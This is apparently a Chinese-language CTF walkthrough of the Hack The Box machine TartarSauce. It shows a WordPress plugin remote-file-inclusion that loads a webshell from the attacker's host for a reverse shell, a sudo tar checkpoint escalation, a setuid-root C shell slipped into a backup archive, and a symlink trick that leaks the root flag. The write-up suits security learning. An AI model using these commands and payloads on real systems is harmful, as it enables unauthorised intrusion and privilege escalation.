- wpscan掃描插件漏洞
- linux命令提權(quán)(https://gtfobins.github.io/)
- ln -s
- stty的連接
- diff會訪問鏈接地址
端口掃描只開放了80,簡單的目錄掃描發(fā)現(xiàn)只有一個robots.txt
里面的東西打開都沒什么用
然后看到目錄掃描還找到一個wordpress的地址
直接上wpscan掃描
wpscan --url http://10.10.10.88/webservices/wp --enumerate p,u --plugins-detection aggressive
掃描結(jié)果顯示有一個插件存在漏洞
直接找一下這個插件是否有其他的漏洞
查看文件里面對應(yīng)的payload,把webshell的名字改成要求的名字wp-load.php
http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5/
kali上nc監(jiān)聽端口有shell連接
sudo -l查看
得知我們可以作為用戶onuma的身份執(zhí)行tar命令,用到的命令,從下面的網(wǎng)站中摘抄
linux命令執(zhí)行shell合集
用到的命令sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
然后發(fā)現(xiàn)一個服務(wù)backuperer最近運(yùn)行過,并且每5min運(yùn)行一次
直接找到,backuperer位置
查看文件類型和內(nèi)容
cat /usr/sbin/backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ???g???
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
腳本邏輯大體如下,先把目標(biāo)/var/www/html目錄打包到/var/tmp,并且命名以點(diǎn)為開頭的文件,等待30s,然后把這個文件進(jìn)行解壓,路徑為/var/tmp/check,然后跟/var/www/html目錄對比
首先在自己本地編譯出一個可執(zhí)行代碼,然后添加suid,
代碼如下
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0);setgid(0);system("/bin/sh");
}
然后按照靶機(jī)路徑/var/www/html打包成一個壓縮包,傳到靶機(jī)/var/tmp路徑下
然后要開一個stty
$ python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
root@kali:~/Desktop# stty raw -echo
fg
Enter
Enter
以上為非必須的,下面內(nèi)容為必須的
onuma@TartarSauce:/$ stty rows 34 columns 194
stty rows 23 columns 79
onuma@TartarSauce:/$ export TERM=xterm-color
export TERM=xterm-color
然后執(zhí)行systemctl list-timers,等倒計(jì)時結(jié)束之后,把我們的tar包跟目標(biāo)文件替換
嫌麻煩的可以執(zhí)行watch -n 1 'systemctl list-timers'()這樣就不用怕ctrl+c斷開連接了,但是一樣能停止命令執(zhí)行),但是必須執(zhí)行過前面說的非必須的內(nèi)容
稍等一會就會有一個check目錄產(chǎn)生
打開里面得目錄就能得到之前編譯過的可執(zhí)行文件,執(zhí)行之后成功切換到root權(quán)限
第二種方法(非提權(quán),拿flag)
diff會訪問,連接文件指向的位置
在/var/www/html下創(chuàng)建一個文件1.txt,然后將/var/www/html目錄打包至/var/tmp下然后用軟連接把里面的1.txt進(jìn)行替換,等到備份程序執(zhí)行后,把文件進(jìn)行替換,然后30s后查看/var/backups/onuma_backup_error.txt,即可得到flag
ln -s /root/root.txt var/www/html/1.txt
